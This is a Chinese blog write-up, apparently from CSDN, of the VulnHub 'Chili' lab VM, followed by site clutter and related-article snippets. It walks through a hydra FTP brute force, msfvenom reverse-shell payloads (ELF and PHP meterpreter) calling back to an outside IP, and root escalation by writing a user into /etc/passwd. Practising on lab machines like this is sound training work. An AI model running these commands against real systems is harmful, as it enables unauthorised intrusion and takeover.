【Vulnhub】Chili

最新推荐文章于 2024-09-07 22:07:09 发布
最新推荐文章于 2024-09-07 22:07:09 发布
阅读量122 收藏
点赞数
分类专栏: Vulnhub 文章标签: php 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangshuaiijie/article/details/131405772
版权

信息收集

在这里插入图片描述
在这里插入图片描述
开了ftp服务和80端口,网站也只有一张图片,扫目录也没有别的

爆破

在这里插入图片描述
一个关键词?用cewl爬一下关键字,再配合rockyou.txt爆破一下ftp。
提示很少,只能用这种暴力方法来尝试rockyou.txt很大,要等些时间

cewl http://192.168.83.145/ > user.txt
hydra -L user.txt -P rockyou.txt 192.168.83.145 ftp

chili:a1b2c3d4

在这里插入图片描述
用xftp连接了一下没什么东西

提权

在这里插入图片描述
用户目录下没什么东西,去看看网站根目录,我们有一个权限比较高的nano目录,msf生成木马上传

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=120.27.114.xx LPORT=7000 -f elf > mshell.elf
我的是云服务器,真实ip所以xx保密

在这里插入图片描述
执行不了。。。。,可能ftp权限不能执行文件吧,那就生成php木马吧,上传上去然后访问页面

msfvenom -p php/meterpreter_reverse_tcp LHOST=120.27.114.84 LPORT=7000 -f raw  > shell.php

在这里插入图片描述
连上了又立马断了,payload忘换了,
在这里插入图片描述
在这里插入图片描述
这下好了,上传检测工具到网站目录下
在这里插入图片描述
shell模式下才能执行脚本
在这里插入图片描述
可以对/etc/psswd操作,添加一个高权限用户

/usr/bin/perl -le 'print crypt("test","test")'
首先在本机通过perl语言生成test用户的密码密文

在这里插入图片描述
ok提权到root,读取flag
在这里插入图片描述

逢星
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
VulnHub靶场系列:Chili
快吃小蛋糕吧的博客
10-05 1375
VulnHub靶场系列:Chili 刚刚在VulnHub官网上找了些简单的靶机,感觉这个还挺适合新手的 环境部署: https://download.vulnhub.com/chili/Chili.ova 实战: 首先使用工具扫描靶机所在网段,得到靶机IP: root@kali:/# nmap -sP 192.168.200.129/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 08:56 CST Nmap scan report f
chili文字高亮
08-28
"Chili文字高亮"是一种专门用于代码高亮显示的技术,它能够使网页中的代码片段根据其语法结构和功能以不同的颜色和样式呈现,从而提高代码的可读性和视觉吸引力。这种技术对于开发者社区和教育平台尤其重要,因为它...
VulnHub渗透测试实战靶场 - CHILI:1
LYJ20010728的博客
08-20 1189
VulnHub渗透测试实战靶场 - CHILI:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.138 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-65
VulnHubChili
Aukum的博客
07-08 935
VulnHub-Chili靶机。涉及ftp爆破,msf生成反弹shell,enumy提权枚举工具,通过/etc/passwd写入用户提权。
Vulnhub---chili
从不专注的人的博客
06-11 410
Vulnhubchili 靶机下载地址:http://www.vulnhub.com/entry/chili-1,558/ 信息收集 扫描网段 nmap -sP 172.16.58.0/24 扫描端口信息及版本信息 nmap -p- 172.16.58.137 nmap -sV 172.16.58.137 访问网站 这里我们访问网页源代码,捕捉到了有用的信息 我们使用cewl工具对网页信息进行爬取并保存到文件中,并将文件中的信息大小写复写,以此作为用户名字典 cewl http://192.1
vulnhubchili
鲨鱼辣椒的博客
06-08 273
信息搜集 扫描网段 扫描
vulnhubChili 靶机
Nicky_Zheng的博客
01-29 812
1、信息收集 1.1、端口扫描 已通过netdiscover发现靶机 ip:192.168.57.142 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-25 17:11 CST Nmap scan report for 192.168.57.142 Host
[vulnhub系列]Chili-靶机
薛定谔嘚喵博客
03-07 2074
在该靶机渗透流程中,前端的信息收集尤为重要,爆破web网页中,查看源代码是很有益处的,可以看到一些敏感信息。以及一些爆破工具的使用,hydra工具是此次渗透的关键,爆破出了ftp账号密码;然后使用ftp端口服务进行ftp权限登陆,查看可执行文件类型,而后生成shell脚本,访问网页,进行反弹shell,得到shell;
VulnHub靶场之CHILI: 1
A_dmin的博客
12-02 856
VulnHub靶场之CHILI: 1 扫描IP以及端口: 访问80端口,一个小辣椒,目录扫描,啥都没有,只能从ftp下手了: 看了看hint,用chili当作用户名试试破解一下密码: 利用hydra破解ftp密码: hydra -l chili -P /usr/share/wordlists/rockyou.txt -f -V ftp://192.168.198.150 得到密码: 成功进入: 进入到/var/www/html下,.nano下可读可写: 上传shell文件,别忘了加权限chmo
vulnhub靶场实战系列(三)之 dc9
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-11 516
发现存在一个目录包含漏洞,我们这里仔细观察发现,这里爆出来的用户名和之前我们数据库跑出来的用户名字居然可以一一对应上,也就是说,我们跑出来的不是网站的用户,而是登录靶机ssh服务的用户,接下来我们就去爆破ssh服务。在使用fuzz爆破前,这里还有一个点要注意,因为我们要爆破的是登录后的页面,所以我们这里首先要获取他的cookie值,再进行爆破。我们发现这里有两个列,一个是username,一个是password,我们先将这两个列单独提取出来,方便后续的渗透使用。面对这样的一个网页,我们应该怎样入手呢?
Chili Piper Chrome Extension-3.0.4792.zip
12-29
名称:Chili Piper Chrome Extension -------------------- 版本:3.0.4792 作者:https://www.chilipiper.com/ 分类:生产工具 -------------------- 概述:安排会议和协作处理电子邮件的最快方式。从任何地方一键...
jQuery chili图片放大特效插件
05-01
内容索引:脚本资源,jQuery,图像放大 jQuery chili图片放大特效插件,类似jqueryZoom的效果,本地图片、远程图片、小图片都可适应此插件。这里要注意用大图用做背景图片引发的问题:  用隐藏的前景图片预加载,...
chili:轻量级简单的 RPC 守护进程
06-25
Chili 可以从命令行运行,使用命令 Chili chili --port=8080 。 端口默认为 8000。这将在指定的端口上启动一个 HTTP 服务器,为请求做好准备。 Chili 可以从命令行使用--key=[path to server key]和--crt=[path to...
pikachu文件包含漏洞靶场
A2893992091的博客
09-03 230
找到中间件的日志文件,例如nginx的logs目录下的access.log文件,做这关之前可以先将之前的日志文件和报错文件删除并重启中间件,方便寻找。包含日志的原理其实就是先使用一句话木马访问网址,在日志上留下可执行的php语句的日志信息,然后使当前页面访问日志,达到执行php语句的效果。若是使用GET直接访问,我们输入的特殊字符就会被编码,达不到执行的效果,所以使用bp抓包的方式访问。发现这里的参数是一个php文件,说明可以将这个参数换成我们的脚本。报错说明访问成功了,我们打开日志文件验证一下。
从0开始的CTF个人练习生涯
CHTXRT的博客
09-03 417
就此离开,没人会受伤
如何优化浏览器缓存
web_geek的博客
09-04 1128
不过您使用的是WordPress,就省事很多,有许多出色的 WordPress 插件可以帮助您设置,大多数好的主机公司也会提供设置合理的默认值,比如Hostease的虚拟主机,在默认设置的基础上,您还可以联系技术支持为您做调整,所以说,选择一个可靠的主机商,对于网站建设来说也是非常重要的。每当用户访问您的网站,他他们的浏览器需要从服务器上下载页面显示所需的资源(图片、CSS、JavaScript 和字体等),这些资源的下载会占用带宽,并需要一定的传输时间。这是一个新文件,因此不存在提供过时文件的风险。
以太坊开发环境
最新发布
禅与代码的艺术
09-07 927
详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后,演示了如何使用 Geth 命令行工具执行各种功能,以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。
中间件解析漏洞
m0_73771249的博客
09-05 674
1.在iis的⽹站根⽬录新建⼀个名为x.asp的⽂件2.在x.asp中新建⼀个jpg⽂件。内容为 asp代码3.在外部浏览器中访问windows2003的iis⽹站中的2.jpg 发现asp代码被执⾏4.将2.jpg⽂件放到⽹站根⽬录下访问,发现其中的asp代码没有被解析。由此可⻅.asp⽂件夹中的任意 ⽂件会被当做asp⽂件去执⾏。
跨平台ASP:ChiliASP与iASP开启非Windows环境运行
Chilisoft公司的chili ASP和Halcycon公司的iASP是两种解决方案,它们旨在打破这种局限性,允许ASP在非Windows环境下运行。特别是iASP,它以“ASP Anytime,Anywhere”为目标,实现了对多种操作系统的支持,包括Unix、...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值